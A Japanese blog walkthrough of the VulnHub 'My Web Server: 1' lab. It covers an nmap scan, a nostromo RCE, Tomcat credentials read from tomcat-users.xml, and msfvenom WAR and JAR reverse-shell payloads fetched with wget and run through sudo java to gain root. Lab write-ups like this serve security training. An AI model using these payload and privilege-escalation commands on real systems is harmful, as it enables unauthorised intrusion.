kurotoのブログ

ただの日記帳

My Web Server:1 のwalkthrough

vulnhub

はじめに

これをやった

www.vulnhub.com

調査・攻撃

nmap地獄

$ nmap -sV -Pn -A 192.168.111.9                                                                                    
Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-15 10:35 JST
Nmap scan report for 192.168.111.9
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
|   256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_  256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (EdDSA)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Armour – Just another WordPress site
2222/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: Radius by TEMPLATED
3306/tcp open  mysql   MySQL (unauthorized)
8081/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Visualize by TEMPLATED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds

searchsploitでいろいろ調べてみると、nostromo 1.9.6にRCEの脆弱性があるようなので、使ってreverse shellをとる

/etc/sudoers.dREADMEmysudoがあった

$ cat mysudo
tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java

ということなので、tomcatユーザ権限を取ればroot権限をとれる

tomcatユーザの調査を行う

$ find / -name tomcat 2>/dev/null
/opt/tomcat
/usr/local/tomcat
$ cat tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
    version="1.0">

    <role rolename="manager-gui"/>
    <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/>
    
    <role rolename="admin-gui"/>
    <user username="admin" password="as3epr04irto" roles="admin-gui"/>    
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

ということで、tomcatのpasswordは@sprot0230spなようなので、tomcatにログインする

tomcatにログインすると、warファイルをアップロードできるので、そのことを利用してshellを取る

下記の記事の通りにmsfvenomを使用してwarファイルを作成する www.hackingarticles.in

f:id:kuroto_jp:20200415234428p:plain
war upload

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.111.28 LPORT=8001 -f war > ./java.war                                                                                                   
Payload size: 1103 bytes
Final size of war file: 1103 bytes

作成したhttp://192.168.111.9:8080/java/にアクセスすることでリバースシェルをとる

$  ncat -lvp 8001                                                                                                                                                                  
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8A35 CC8A A242 2509 93CB 0F8B 4D08 D92E 2837 C1B8
Ncat: Listening on :::8001
Ncat: Listening on 0.0.0.0:8001
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:49108.
python -c "import pty;pty.spwan('/bin/bash');"
tomcat@webserver:~$

mysudoにあったように、javaがroot権限で動かせるので、warファイルを作ったときと同様にjarファイルを作成する

$ msfvenom java -f jar -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -o shell.jar

作ったshell.jarwget等でダウンロードさせ、実行する

$ msfvenom java -f jar -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -o shell.jar
$ python2 -m SimpleHTTPServer 8080

tomcat@webserver:~$ wget http://192.168.111.28:8080/shell.jar
--2020-04-15 20:33:45--  http://192.168.111.28:8080/shell.jar
Connecting to 192.168.111.28:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7552 (7.4K) [application/java-archive]
Saving to: ‘shell.jar’

shell.jar           100%[===================>]   7.38K  --.-KB/s    in 0.02s   

2020-04-15 20:33:45 (418 KB/s) - ‘shell.jar’ saved [7552/7552]
tomcat@webserver:~$ sudo -u root java -jar shell.jar
sudo: unable to resolve host webserver: Name or service not known

待ち受け側

$ ncat -lvp 8002
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: EDB6 FA48 3B73 E837 AAA6 E009 EC1F 80D6 CB34 32DB
Ncat: Listening on :::8002
Ncat: Listening on 0.0.0.0:8002
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:34584.
python3 -c "import pty; pty.spawn('/bin/bash');"
root@webserver:/opt/tomcat#
root@webserver:/opt/tomcat# cd /root
root@webserver:~# ls
proof.txt
root@webserver:~# cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eep2ff0LbLYZrFq

終わりに

初めてのDifficulty: Medium/Intermediate Levelだったが、似た問題やったことがあったので、そこまで時間はかからなかった 次からはOSCP Likeな問題をやっていく